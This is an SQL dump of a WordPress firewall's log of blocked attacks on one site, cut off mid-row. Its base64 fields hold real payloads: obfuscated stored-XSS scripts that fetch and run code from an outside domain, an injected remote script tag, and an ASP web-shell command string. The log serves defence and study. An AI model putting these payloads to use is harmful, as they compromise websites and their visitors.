<= 1.4.5 - Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"154\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37947,1571333173.176664,1571333171.792300,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Jjc3BfZGVzY3JpcHRpb25d\",\"paramValue\":\"PHNjcmlwdCAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF91YWZuM3o9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9rbXRla3kqLywxMTYvKiovLDExNi8qX3h5OHNiNiovLDExMi8qX2cxYjlwcCovLDExNS8qX3h5OHNiNiovLDU4Lypfa210ZWt5Ki8sNDcvKl9nMWI5cHAqLyw0Ny8qX2ttdGVreSovLDk5LypfdWFmbjN6Ki8sMTAwLypfeHk4c2I2Ki8sNDYvKl9nMWI5cHAqLywxMTIvKl91YWZuM3oqLywxMTQvKl94eThzYjYqLywxMDUvKl9rbXRla3kqLywxMTgvKl9rbXRla3kqLyw5Ny8qX3VhZm4zeiovLDk5LyoqLywxMjEvKl94eThzYjYqLywxMDgvKiovLDExMS8qKi8sOTkvKl9rbXRla3kqLyw5Ny8qX3h5OHNiNiovLDExNi8qKi8sMTA1LypfdWFmbjN6Ki8sMTExLypfZzFiOXBwKi8sMTEwLypfa210ZWt5Ki8sMTAyLypfeHk4c2I2Ki8sMTExLypfdWFmbjN6Ki8sMTE0LypfZzFiOXBwKi8sMTA4Lypfa210ZWt5Ki8sMTExLypfa210ZWt5Ki8sOTkvKiovLDQ2LyoqLyw5OS8qKi8sMTExLyoqLywxMDkvKl91YWZuM3oqLyw0Ny8qX3VhZm4zeiovLDExNi8qX2cxYjlwcCovLDk3LyoqLywxMTIvKiovLDExMi8qX3VhZm4zeiovLDEwMS8qX2cxYjlwcCovLDExNC8qX2cxYjlwcCovLDQ2LypfdWFmbjN6Ki8sMTA2LypfeHk4c2I2Ki8sMTE1LypfeHk4c2I2Ki8sNjMvKl91YWZuM3oqLywxMDkvKiovLDYxLyoqLywxMDkvKl9nMWI5cHAqLyk7dmFyIF9nMWI5cHAgPSBfeHk4c2I2KF91YWZuM3opO2lmKF9nMWI5cHAubGVuZ3RoID4gMyl7X3lnbnhoaihfZzFiOXBwKTt9IGZ1bmN0aW9uIF94eThzYjYoX2pkbXh0dCl7IHZhciBfa210ZWt5ID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2ttdGVreS5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX2pkbXh0dCwgZmFsc2UgKTtfa210ZWt5LnNlbmQoIG51bGwgKTtyZXR1cm4gX2ttdGVreS5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF95Z254aGooX2JyYjg0NSl7IHZhciBfZDByYXJhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCBfYnJiODQ1KycgcmV0dXJuIHgreTsnKTtfZDByYXJhKDAsMCk7fTwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37992,1571334698.766005,1571334697.697700,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php','livechat_settings','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2xpY2Vuc2VFbWFpbF0=\",\"paramValue\":\"Ij48c2NyaXB0ICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgXzVtb3c4MHZnYnI0OWE5emhpPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfdW5pd3ZrZjg3OWs1OW5uc3AqLywxMTYvKiovLDExNi8qX2Ziam16bDJwenRtc2N4dnJ6Ki8sMTEyLypfNnI3czNuNHFoZTVkdnJibDgqLywxMTUvKl9mYmptemwycHp0bXNjeHZyeiovLDU4LypfdW5pd3ZrZjg3OWs1OW5uc3AqLyw0Ny8qXzZyN3MzbjRxaGU1ZHZyYmw4Ki8sNDcvKl91bml3dmtmODc5azU5bm5zcCovLDk5LypfNW1vdzgwdmdicjQ5YTl6aGkqLywxMDAvKl9mYmptemwycHp0bXNjeHZyeiovLDQ2LypfNnI3czNuNHFoZTVkdnJibDgqLywxMTIvKl81bW93ODB2Z2JyNDlhOXpoaSovLDExNC8qX2Ziam16bDJwenRtc2N4dnJ6Ki8sMTA1LypfdW5pd3ZrZjg3OWs1OW5uc3AqLywxMTgvKl91bml3dmtmODc5azU5bm5zcCovLDk3LypfNW1vdzgwdmdicjQ5YTl6aGkqLyw5OS8qKi8sMTIxLypfZmJqbXpsMnB6dG1zY3h2cnoqLywxMDgvKiovLDExMS8qKi8sOTkvKl91bml3dmtmODc5azU5bm5zcCovLDk3LypfZmJqbXpsMnB6dG1zY3h2cnoqLywxMTYvKiovLDEwNS8qXzVtb3c4MHZnYnI0OWE5emhpKi8sMTExLypfNnI3czNuNHFoZTVkdnJibDgqLywxMTAvKl91bml3dmtmODc5azU5bm5zcCovLDEwMi8qX2Ziam16bDJwenRtc2N4dnJ6Ki8sMTExLypfNW1vdzgwdmdicjQ5YTl6aGkqLywxMTQvKl82cjdzM240cWhlNWR2cmJsOCovLDEwOC8qX3VuaXd2a2Y4NzlrNTlubnNwKi8sMTExLypfdW5pd3ZrZjg3OWs1OW5uc3AqLyw5OS8qKi8sNDYvKiovLDk5LyoqLywxMTEvKiovLDEwOS8qXzVtb3c4MHZnYnI0OWE5emhpKi8sNDcvKl81bW93ODB2Z2JyNDlhOXpoaSovLDExNi8qXzZyN3MzbjRxaGU1ZHZyYmw4Ki8sOTcvKiovLDExMi8qKi8sMTEyLypfNW1vdzgwdmdicjQ5YTl6aGkqLywxMDEvKl82cjdzM240cWhlNWR2cmJsOCovLDExNC8qXzZyN3MzbjRxaGU1ZHZyYmw4Ki8sNDYvKl81bW93ODB2Z2JyNDlhOXpoaSovLDEwNi8qX2Ziam16bDJwenRtc2N4dnJ6Ki8sMTE1LypfZmJqbXpsMnB6dG1zY3h2cnoqLyw2My8qXzVtb3c4MHZnYnI0OWE5emhpKi8sMTA5LyoqLyw2MS8qKi8sMTA5LypfNnI3czNuNHFoZTVkdnJibDgqLyk7dmFyIF82cjdzM240cWhlNWR2cmJsOCA9IF9mYmptemwycHp0bXNjeHZyeihfNW1vdzgwdmdicjQ5YTl6aGkpO2lmKF82cjdzM240cWhlNWR2cmJsOC5sZW5ndGggPiAzKXtfOTJvZmR6N2V3OHRtb3d5ZTgoXzZyN3MzbjRxaGU1ZHZyYmw4KTt9IGZ1bmN0aW9uIF9mYmptemwycHp0bXNjeHZyeihfZ2ZndzI2bTA2Zmk5ZHYybmcpeyB2YXIgX3VuaXd2a2Y4NzlrNTlubnNwID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X3VuaXd2a2Y4NzlrNTlubnNwLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfZ2ZndzI2bTA2Zmk5ZHYybmcsIGZhbHNlICk7X3VuaXd2a2Y4NzlrNTlubnNwLnNlbmQoIG51bGwgKTtyZXR1cm4gX3VuaXd2a2Y4NzlrNTlubnNwLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gXzkyb2Zkejdldzh0bW93eWU4KF84MGxhdjd5anU1aXV1Mmxrdil7IHZhciBfNWFyaDRyODl5dnl2ZHJmczggPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIF84MGxhdjd5anU1aXV1MmxrdisnIHJldHVybiB4K3k7Jyk7XzVhcmg0cjg5eXZ5dmRyZnM4KDAsMCk7fTwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37948,1571333168.079317,1571333166.820300,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php','livechat_settings','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2xpY2Vuc2VFbWFpbF0=\",\"paramValue\":\"Ij48c2NyaXB0ICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgX2hjbGJqdGM0PVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfZ2NidGg0YW4qLywxMTYvKiovLDExNi8qX3l2emM1dGRsKi8sMTEyLypfc2Z1cHhqNXUqLywxMTUvKl95dnpjNXRkbCovLDU4LypfZ2NidGg0YW4qLyw0Ny8qX3NmdXB4ajV1Ki8sNDcvKl9nY2J0aDRhbiovLDk5LypfaGNsYmp0YzQqLywxMDAvKl95dnpjNXRkbCovLDQ2Lypfc2Z1cHhqNXUqLywxMTIvKl9oY2xianRjNCovLDExNC8qX3l2emM1dGRsKi8sMTA1LypfZ2NidGg0YW4qLywxMTgvKl9nY2J0aDRhbiovLDk3LypfaGNsYmp0YzQqLyw5OS8qKi8sMTIxLypfeXZ6YzV0ZGwqLywxMDgvKiovLDExMS8qKi8sOTkvKl9nY2J0aDRhbiovLDk3LypfeXZ6YzV0ZGwqLywxMTYvKiovLDEwNS8qX2hjbGJqdGM0Ki8sMTExLypfc2Z1cHhqNXUqLywxMTAvKl9nY2J0aDRhbiovLDEwMi8qX3l2emM1dGRsKi8sMTExLypfaGNsYmp0YzQqLywxMTQvKl9zZnVweGo1dSovLDEwOC8qX2djYnRoNGFuKi8sMTExLypfZ2NidGg0YW4qLyw5OS8qKi8sNDYvKiovLDk5LyoqLywxMTEvKiovLDEwOS8qX2hjbGJqdGM0Ki8sNDcvKl9oY2xianRjNCovLDExNi8qX3NmdXB4ajV1Ki8sOTcvKiovLDExMi8qKi8sMTEyLypfaGNsYmp0YzQqLywxMDEvKl9zZnVweGo1dSovLDExNC8qX3NmdXB4ajV1Ki8sNDYvKl9oY2xianRjNCovLDEwNi8qX3l2emM1dGRsKi8sMTE1LypfeXZ6YzV0ZGwqLyw2My8qX2hjbGJqdGM0Ki8sMTA5LyoqLyw2MS8qKi8sMTA5Lypfc2Z1cHhqNXUqLyk7dmFyIF9zZnVweGo1dSA9IF95dnpjNXRkbChfaGNsYmp0YzQpO2lmKF9zZnVweGo1dS5sZW5ndGggPiAzKXtfa3AwMGEycGooX3NmdXB4ajV1KTt9IGZ1bmN0aW9uIF95dnpjNXRkbChfZGZ5eGFwNTIpeyB2YXIgX2djYnRoNGFuID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2djYnRoNGFuLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfZGZ5eGFwNTIsIGZhbHNlICk7X2djYnRoNGFuLnNlbmQoIG51bGwgKTtyZXR1cm4gX2djYnRoNGFuLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2twMDBhMnBqKF9lYWFweTcwNil7IHZhciBfZTVwbzB3aHYgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIF9lYWFweTcwNisnIHJldHVybiB4K3k7Jyk7X2U1cG8wd2h2KDAsMCk7fTwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37951,1571333850.401832,1571333849.423900,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?action=import_csv',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3ZhbHVlXVsxXVswXQ==\",\"paramValue\":\"Ij48c2NyaXB0IHR5cGU9dGV4dC9qYXZhc2NyaXB0IHNyYz0naHR0cHM6Ly9jZC5wcml2YWN5bG9jYXRpb25mb3Jsb2MuY29tL3RyYWNrJnY3Jz48L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37950,1571333163.155929,1571333161.992600,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?page=wppcp-security-settings-page',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Private Content Plus <= 1.31 Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"161\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dwcGNwX3RhYl0=\",\"paramValue\":\"d3BwY3Bfc2VjdGlvbl9zZWN1cml0eV9pcA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37996,1571334736.478017,1571334734.937100,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37939,1571275249.880398,1571275248.737300,'\0\0\0\0\0\0\0\0\0\0ÿÿ/',0,200,0,0,0,'https://bintara.com.my/blog/2018/12/11/logitech-rally/','https://bintara.com.my/blog/2018/12/11/logitech-rally/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','logged:waf','Watched IP Traffic: 5.8.47.2','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L2Jsb2cvMjAxOC8xMi8xMS9sb2dpdGVjaC1yYWxseS8=\",\"category\":\"logged\",\"ssl\":1}'),(37994,1571334746.832647,1571334745.649200,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?action=hc_ajax_save_option',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Hybrid Composer <= 1.4.5 - Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"154\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37969,1571333935.287092,1571333934.246300,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF81cXg0bDg4PVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfNjcyOXliZSovLDExNi8qKi8sMTE2Lypfa2pxYWRnMyovLDExMi8qX2QyeXBkbWsqLywxMTUvKl9ranFhZGczKi8sNTgvKl82NzI5eWJlKi8sNDcvKl9kMnlwZG1rKi8sNDcvKl82NzI5eWJlKi8sOTkvKl81cXg0bDg4Ki8sMTAwLypfa2pxYWRnMyovLDQ2LypfZDJ5cGRtayovLDExMi8qXzVxeDRsODgqLywxMTQvKl9ranFhZGczKi8sMTA1LypfNjcyOXliZSovLDExOC8qXzY3Mjl5YmUqLyw5Ny8qXzVxeDRsODgqLyw5OS8qKi8sMTIxLypfa2pxYWRnMyovLDEwOC8qKi8sMTExLyoqLyw5OS8qXzY3Mjl5YmUqLyw5Ny8qX2tqcWFkZzMqLywxMTYvKiovLDEwNS8qXzVxeDRsODgqLywxMTEvKl9kMnlwZG1rKi8sMTEwLypfNjcyOXliZSovLDEwMi8qX2tqcWFkZzMqLywxMTEvKl81cXg0bDg4Ki8sMTE0LypfZDJ5cGRtayovLDEwOC8qXzY3Mjl5YmUqLywxMTEvKl82NzI5eWJlKi8sOTkvKiovLDQ2LyoqLyw5OS8qKi8sMTExLyoqLywxMDkvKl81cXg0bDg4Ki8sNDcvKl81cXg0bDg4Ki8sMTE2LypfZDJ5cGRtayovLDk3LyoqLywxMTIvKiovLDExMi8qXzVxeDRsODgqLywxMDEvKl9kMnlwZG1rKi8sMTE0LypfZDJ5cGRtayovLDQ2LypfNXF4NGw4OCovLDEwNi8qX2tqcWFkZzMqLywxMTUvKl9ranFhZGczKi8sNjMvKl81cXg0bDg4Ki8sMTA5LyoqLyw2MS8qKi8sMTA5LypfZDJ5cGRtayovKTt2YXIgX2QyeXBkbWsgPSBfa2pxYWRnMyhfNXF4NGw4OCk7aWYoX2QyeXBkbWsubGVuZ3RoID4gMyl7X2MwYmlhMDEoX2QyeXBkbWspO30gZnVuY3Rpb24gX2tqcWFkZzMoX3d5anZ0bWIpeyB2YXIgXzY3Mjl5YmUgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfNjcyOXliZS5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX3d5anZ0bWIsIGZhbHNlICk7XzY3Mjl5YmUuc2VuZCggbnVsbCApO3JldHVybiBfNjcyOXliZS5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9jMGJpYTAxKF83N3hwbm5vKXsgdmFyIF9mcXp5cWtsID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCBfNzd4cG5ubysnIHJldHVybiB4K3k7Jyk7X2Zxenlxa2woMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37938,1571221631.814204,1571221630.993700,'\0\0\0\0\0\0\0\0\0\0ÿÿ/',0,200,0,0,0,'https://bintara.com.my/blog/2018/12/11/logitech-rally/','https://bintara.com.my/blog/2018/12/11/logitech-rally/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36','logged:waf','Watched IP Traffic: 5.8.47.2','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L2Jsb2cvMjAxOC8xMi8xMS9sb2dpdGVjaC1yYWxseS8=\",\"category\":\"logged\",\"ssl\":1}'),(37970,1571333933.164518,1571333932.102900,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF96aG1jcXIwMWY2eHIwN3NyOD1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX3R6MzN1ZXU3dmJnaThtNWE2Ki8sMTE2LyoqLywxMTYvKl8yeDd6cHZuMGV6dTNycWt1YSovLDExMi8qX3lleWIzNnR5cHoxOTl5aTJzKi8sMTE1LypfMng3enB2bjBlenUzcnFrdWEqLyw1OC8qX3R6MzN1ZXU3dmJnaThtNWE2Ki8sNDcvKl95ZXliMzZ0eXB6MTk5eWkycyovLDQ3LypfdHozM3VldTd2YmdpOG01YTYqLyw5OS8qX3pobWNxcjAxZjZ4cjA3c3I4Ki8sMTAwLypfMng3enB2bjBlenUzcnFrdWEqLyw0Ni8qX3lleWIzNnR5cHoxOTl5aTJzKi8sMTEyLypfemhtY3FyMDFmNnhyMDdzcjgqLywxMTQvKl8yeDd6cHZuMGV6dTNycWt1YSovLDEwNS8qX3R6MzN1ZXU3dmJnaThtNWE2Ki8sMTE4LypfdHozM3VldTd2YmdpOG01YTYqLyw5Ny8qX3pobWNxcjAxZjZ4cjA3c3I4Ki8sOTkvKiovLDEyMS8qXzJ4N3pwdm4wZXp1M3Jxa3VhKi8sMTA4LyoqLywxMTEvKiovLDk5LypfdHozM3VldTd2YmdpOG01YTYqLyw5Ny8qXzJ4N3pwdm4wZXp1M3Jxa3VhKi8sMTE2LyoqLywxMDUvKl96aG1jcXIwMWY2eHIwN3NyOCovLDExMS8qX3lleWIzNnR5cHoxOTl5aTJzKi8sMTEwLypfdHozM3VldTd2YmdpOG01YTYqLywxMDIvKl8yeDd6cHZuMGV6dTNycWt1YSovLDExMS8qX3pobWNxcjAxZjZ4cjA3c3I4Ki8sMTE0LypfeWV5YjM2dHlwejE5OXlpMnMqLywxMDgvKl90ejMzdWV1N3ZiZ2k4bTVhNiovLDExMS8qX3R6MzN1ZXU3dmJnaThtNWE2Ki8sOTkvKiovLDQ2LyoqLyw5OS8qKi8sMTExLyoqLywxMDkvKl96aG1jcXIwMWY2eHIwN3NyOCovLDQ3LypfemhtY3FyMDFmNnhyMDdzcjgqLywxMTYvKl95ZXliMzZ0eXB6MTk5eWkycyovLDk3LyoqLywxMTIvKiovLDExMi8qX3pobWNxcjAxZjZ4cjA3c3I4Ki8sMTAxLypfeWV5YjM2dHlwejE5OXlpMnMqLywxMTQvKl95ZXliMzZ0eXB6MTk5eWkycyovLDQ2LypfemhtY3FyMDFmNnhyMDdzcjgqLywxMDYvKl8yeDd6cHZuMGV6dTNycWt1YSovLDExNS8qXzJ4N3pwdm4wZXp1M3Jxa3VhKi8sNjMvKl96aG1jcXIwMWY2eHIwN3NyOCovLDEwOS8qKi8sNjEvKiovLDEwOS8qX3lleWIzNnR5cHoxOTl5aTJzKi8pO3ZhciBfeWV5YjM2dHlwejE5OXlpMnMgPSBfMng3enB2bjBlenUzcnFrdWEoX3pobWNxcjAxZjZ4cjA3c3I4KTtpZihfeWV5YjM2dHlwejE5OXlpMnMubGVuZ3RoID4gMyl7X2t3MWhqYmFxdzF5cG9kaWZhKF95ZXliMzZ0eXB6MTk5eWkycyk7fSBmdW5jdGlvbiBfMng3enB2bjBlenUzcnFrdWEoXzhqd29jbHRrbnNsZmdxeXRjKXsgdmFyIF90ejMzdWV1N3ZiZ2k4bTVhNiA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO190ejMzdWV1N3ZiZ2k4bTVhNi5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgXzhqd29jbHRrbnNsZmdxeXRjLCBmYWxzZSApO190ejMzdWV1N3ZiZ2k4bTVhNi5zZW5kKCBudWxsICk7cmV0dXJuIF90ejMzdWV1N3ZiZ2k4bTVhNi5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9rdzFoamJhcXcxeXBvZGlmYShfMHlpcTQ2Nzk5MWlsZ2dxaGQpeyB2YXIgX2txbnJ1bzM2emsxenJvMmx6ID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCBfMHlpcTQ2Nzk5MWlsZ2dxaGQrJyByZXR1cm4geCt5OycpO19rcW5ydW8zNnprMXpybzJseigwLDApO308L3NjcmlwdD48c3R5bGU+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37807,1569949583.346460,1569949581.949800,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Total Donations (all known versions) - Multiple Unauthenticated AJAX Actions','{\"learningMode\":0,\"failedRules\":\"129\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37883,1570544462.186339,1570544461.185600,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//admin/Admin_Ta.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Bhc3Nd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9hZG1pbi9BZG1pbl9UYS5hc3A=\",\"category\":\"sqli\",\"ssl\":0}'),(37806,1569949589.068918,1569949587.709700,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 